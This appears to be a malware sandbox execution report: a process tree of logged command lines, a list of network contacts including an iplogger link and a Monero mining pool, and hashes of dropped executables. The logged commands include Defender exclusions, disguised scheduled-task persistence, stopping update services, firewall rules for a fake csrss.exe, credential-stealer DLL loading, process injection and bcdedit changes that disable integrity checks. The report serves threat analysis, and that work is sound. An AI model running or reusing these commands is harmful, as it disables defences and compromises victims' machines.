C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe

"C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp" /SL5="$201D4,833775,56832,C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 396

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2112 CREDAT:275457 /prefetch:2

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\1130335503.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231004220120.log C:\Windows\Logs\CBS\CbsPersist_20231004220120.cab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe

"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"

C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.32.208:443 lycheepanel.info tcp
US 188.114.97.1:443 jetpackdelivery.net tcp
US 172.67.216.81:443 flyawayaero.net tcp
RU 45.8.228.16:80 goboh2b.top tcp
NL 13.227.219.122:443 downloads.digitalpulsedata.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 172.67.180.173:443 potatogoose.com tcp
NL 88.221.25.169:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.96.0:443 justsafepay.com tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:80 link.storjshare.io tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
BG 193.42.32.29:80 193.42.32.29 tcp
DE 168.119.152.22:443 demo.seafile.com tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 connectini.net udp
NL 149.154.167.99:443 t.me tcp
GB 91.109.116.11:443 connectini.net tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
DE 116.203.7.13:80 116.203.7.13 tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 8.8.8.8:53 link.storjshare.io udp
DE 52.219.171.170:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 136.0.77.2:443 link.storjshare.io tcp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 873adf6a-6f71-4482-99eb-fc7c976f0505.uuid.safarimexican.net udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 server8.safarimexican.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 142.251.125.127:19302 stun1.l.google.com udp
BG 185.82.216.65:443 server8.safarimexican.net tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp

Files

memory/2408-0-0x00000000009C0000-0x0000000000A1E000-memory.dmp

memory/2408-1-0x0000000074980000-0x000000007506E000-memory.dmp

memory/2408-2-0x0000000004E00000-0x0000000004E40000-memory.dmp

memory/2408-3-0x0000000000500000-0x0000000000544000-memory.dmp

memory/2408-4-0x0000000000640000-0x000000000065A000-memory.dmp

memory/2264-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2264-7-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2264-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2408-10-0x0000000074980000-0x000000007506E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab5F32.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar5FD1.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 549299d0ef99b448b3fda55988424fa9
SHA1 59e3ec623526ceb52e29c1689c10e1c6946078f4
SHA256 56a3ffe51cabb84d03aa71e92064c09ae76eea33d5480f5603ba349644d2842e
SHA512 706ad9a734fe4ad926fe2e6f644e175bb17a22f2198d111a7ac01df206d625b9b1507a46fdee1848147eb44537d048e7203cea230c8a4449b064cc90e9e640f2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ba45772adb000d083a1400cbfbbee971
SHA1 5db6de5b5c28c27ebc63060ff5f33f562b00506f
SHA256 f4715e640eb4b5b39a1379ee4e251f4e7429cdf42406474b4da0943af2788e18
SHA512 2a86b40cef7570339e3ee7323c6038ad523e47a02f7e648fbe95b4f57f784d879a7933b5b043c29ffe8c2da64d82685d8e0c9b60ee0520a2e6c9d3861bdeefda

\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/1664-168-0x00000000025B0000-0x00000000029A8000-memory.dmp

C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

MD5 006ad74c21256de16ed0f79f760dc2da
SHA1 03372373476c4ffad5a4016950e5834451872c3f
SHA256 c4410af6b21ec0894ede95baaf3314f8260ab62051abe107b83b5c3d091e97f4
SHA512 c7184ab98553159d9b05ef3a3ec5a3036159683a7aed963193a77b17df900ba8fd7dedf85fa67525acc6bd3bdfc403f8622a8c3c6edcac38abb5c79f432e43df

C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

MD5 006ad74c21256de16ed0f79f760dc2da
SHA1 03372373476c4ffad5a4016950e5834451872c3f
SHA256 c4410af6b21ec0894ede95baaf3314f8260ab62051abe107b83b5c3d091e97f4
SHA512 c7184ab98553159d9b05ef3a3ec5a3036159683a7aed963193a77b17df900ba8fd7dedf85fa67525acc6bd3bdfc403f8622a8c3c6edcac38abb5c79f432e43df

\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

MD5 006ad74c21256de16ed0f79f760dc2da
SHA1 03372373476c4ffad5a4016950e5834451872c3f
SHA256 c4410af6b21ec0894ede95baaf3314f8260ab62051abe107b83b5c3d091e97f4
SHA512 c7184ab98553159d9b05ef3a3ec5a3036159683a7aed963193a77b17df900ba8fd7dedf85fa67525acc6bd3bdfc403f8622a8c3c6edcac38abb5c79f432e43df

\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

MD5 006ad74c21256de16ed0f79f760dc2da
SHA1 03372373476c4ffad5a4016950e5834451872c3f
SHA256 c4410af6b21ec0894ede95baaf3314f8260ab62051abe107b83b5c3d091e97f4
SHA512 c7184ab98553159d9b05ef3a3ec5a3036159683a7aed963193a77b17df900ba8fd7dedf85fa67525acc6bd3bdfc403f8622a8c3c6edcac38abb5c79f432e43df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 680d0e220e89bb4239a91eb1b178cd3a
SHA1 69febd62cb442079e318e05cb9db11e28a0a07fd
SHA256 b4a0febd35b909b0871bfba4cc88d7e29105ca15c622c7a853b060e5f8e88fbd
SHA512 69607c3423cc129475279883aae41f28b5ec53ac2debc55ffadd5ccf8269206e2fba995e24c058c89b374ee50cc2a289b2cd10e5b4e8c321a101913481ef1855

memory/1224-175-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe

MD5 5b77a9cdeab3ed6d40ed1221f5a56555
SHA1 b3734ff6cdad8e7f8b1602a9c50b956054940a37
SHA256 d6dd05f58c914cf5b6a1d99c703f4812b23c03f4057cc298517e166f26b5e0e1
SHA512 b4225dc696807da8904e4b47c7f9b56e999cb1182545677128c6c7c1663e0f556a3be9d48337c26e883d7515316e7adb9a4e016727ff219d7f06e91188325389

C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe

MD5 5b77a9cdeab3ed6d40ed1221f5a56555
SHA1 b3734ff6cdad8e7f8b1602a9c50b956054940a37
SHA256 d6dd05f58c914cf5b6a1d99c703f4812b23c03f4057cc298517e166f26b5e0e1
SHA512 b4225dc696807da8904e4b47c7f9b56e999cb1182545677128c6c7c1663e0f556a3be9d48337c26e883d7515316e7adb9a4e016727ff219d7f06e91188325389

C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe

MD5 5b77a9cdeab3ed6d40ed1221f5a56555
SHA1 b3734ff6cdad8e7f8b1602a9c50b956054940a37
SHA256 d6dd05f58c914cf5b6a1d99c703f4812b23c03f4057cc298517e166f26b5e0e1
SHA512 b4225dc696807da8904e4b47c7f9b56e999cb1182545677128c6c7c1663e0f556a3be9d48337c26e883d7515316e7adb9a4e016727ff219d7f06e91188325389

memory/2264-240-0x000000000A390000-0x000000000A8DD000-memory.dmp

memory/1312-243-0x0000000001360000-0x00000000018AD000-memory.dmp

\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
SHA1 7d290d99217454b9b4c5133349ce165c56bc763e
SHA256 0e3d94e1f3a765bf1c7fbb407619cc07b3b24741b0f7f87283aff58483b82072
SHA512 3a531e97ebda276f9284bdb352fdbbb04bddb7915bccd815437d959f4a8405f9770c6f46dcd0070a1991e88b654665bc87c748c173765b30d3b7329af86999bf

C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
